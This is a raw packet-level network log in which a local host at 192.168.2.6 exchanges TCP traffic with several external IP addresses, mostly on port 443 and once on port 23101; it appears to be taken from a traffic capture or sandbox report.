                                                        Dec 17, 2024 14:30:06.707663059 CET49713443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:06.707781076 CET49713443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:06.707814932 CET4434971345.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:35.904792070 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:35.904820919 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:35.904917002 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:35.905478954 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:35.905504942 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.151572943 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.151674986 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:37.153127909 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:37.153158903 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.153507948 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.154467106 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:37.199342012 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.607609034 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.607702017 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.607764959 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:37.607781887 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.607829094 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.607889891 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:37.607907057 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.615777016 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.615879059 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:37.615894079 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.630759001 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.630817890 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:37.630826950 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.688364029 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:37.688384056 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.799576998 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.799631119 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.799664974 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:37.799694061 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.799741030 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:37.803407907 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.811139107 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.811192989 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:37.811206102 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.819241047 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.819288969 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:37.819298983 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.827554941 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.827605963 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:37.827617884 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.834460974 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.834507942 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:37.834521055 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.842062950 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.844158888 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:37.844166994 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.849781990 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.853384972 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:37.853394032 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.865195036 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.865432978 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.865490913 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:37.865502119 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.865554094 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:37.873239040 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.879113913 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.879187107 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:37.879195929 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.886229038 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.886296988 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:37.886305094 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.893610954 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.893665075 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:37.893673897 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.911684990 CET49790443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:37.911755085 CET4434979045.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:37.911853075 CET49790443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:37.979743004 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:37.992867947 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.994849920 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:37.994920015 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:37.994956017 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.004355907 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.004364967 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.004424095 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.004443884 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.013736010 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.013806105 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.013825893 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.013884068 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.018013954 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.018089056 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.026362896 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.026374102 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.026447058 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.040714979 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.040724993 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.040760040 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.040776014 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.040853024 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.040868044 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.046834946 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.046894073 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.046911955 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.046966076 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.052319050 CET49790443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:38.052351952 CET4434979045.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:38.055094004 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.055104017 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.055166006 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.063394070 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.063462973 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.067715883 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.068025112 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.075815916 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.075964928 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.080095053 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.080169916 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.183931112 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.184009075 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.186465979 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.186531067 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.192914009 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.192986965 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.199459076 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.199542999 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.205513954 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.205574036 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.208619118 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.208683968 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.214416981 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.214478970 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.217420101 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.217489958 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.223297119 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.223371983 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.229005098 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.229073048 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.229101896 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.234859943 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.234939098 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.237715006 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.237783909 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.243634939 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.243695021 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.249404907 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.249468088 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.252373934 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.252443075 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.256747007 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.256820917 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.262479067 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.262538910 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.268398046 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.268455982 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.274424076 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.274481058 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.277111053 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.277178049 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.282823086 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.282896996 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.288520098 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.288583994 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.291481972 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.291547060 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.304063082 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.304126978 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.376082897 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.376163960 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.380511045 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.380589962 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.382823944 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.382886887 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.387620926 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.387701988 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.397937059 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.397969007 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.398019075 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.398039103 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.398077965 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.398133993 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.410046101 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.410068989 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.410115004 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.410137892 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.410173893 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.423197985 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.423219919 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.423271894 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.423290014 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.423341990 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.433041096 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.433060884 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.433140993 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.433157921 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.440018892 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.440038919 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.440088987 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.440115929 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.440140963 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.447668076 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.447689056 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.447734118 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.447757006 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.447781086 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.454179049 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.454200983 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.454247952 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.454262972 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.454288960 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.574371099 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.574394941 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.574460983 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.574495077 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.574520111 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.581650019 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.581660032 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.581679106 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.581688881 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.581722021 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.581737041 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.581763029 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.588421106 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.588464022 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.588480949 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.588494062 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.588495970 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.588520050 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.588546038 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.588546038 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.595149040 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.595170021 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.595204115 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.595216036 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.595254898 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.595283985 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.602474928 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.602494955 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.602560997 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.602598906 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.602631092 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.607562065 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.607579947 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.607665062 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.607682943 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.615164995 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.615187883 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.615232944 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.615266085 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.615298986 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.622299910 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.622323036 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.622368097 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.622400999 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.622426987 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.682794094 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.795355082 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.795367956 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.795419931 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.795439959 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.795463085 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.795504093 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.795504093 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.795551062 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.795680046 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.802665949 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.802686930 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.802733898 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.802762985 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.802784920 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.802851915 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.809683084 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.809701920 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.809767008 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.809782028 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.809833050 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.816087008 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.816114902 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.816155910 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.816169024 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.816219091 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.816219091 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.823112965 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.823147058 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.823189020 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.823206902 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.823230028 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.823260069 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.829399109 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.829420090 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.829467058 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.829479933 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.829507113 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.829536915 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.836080074 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.836100101 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.836148977 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.836162090 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.836194992 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.836194992 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.843055964 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.843092918 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.843147039 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.843159914 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.843185902 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.843244076 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.988070965 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.988099098 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.988145113 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.988183022 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.988208055 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.988269091 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.995032072 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.995071888 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.995100021 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.995111942 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.995210886 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.995249033 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:39.001214027 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:39.001235008 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:39.001279116 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:39.001291990 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:39.001317024 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:39.001363039 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:39.008225918 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:39.008279085 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:39.008300066 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:39.008311987 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:39.008341074 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:39.008361101 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:39.008371115 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:39.010090113 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:39.010143995 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:39.010158062 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:39.010215044 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:39.010226965 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:39.010247946 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:39.010293007 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:39.010579109 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:39.403075933 CET4434979045.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:39.403172970 CET49790443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:39.420402050 CET4979523101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:30:39.422683954 CET49790443192.168.2.645.63.94.214
                                                        Dec 17, 2024 14:30:39.422729015 CET4434979045.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:39.423055887 CET4434979045.63.94.214192.168.2.6
                                                        Dec 17, 2024 14:30:39.423116922 CET49790443192.168.2.645.63.94.214
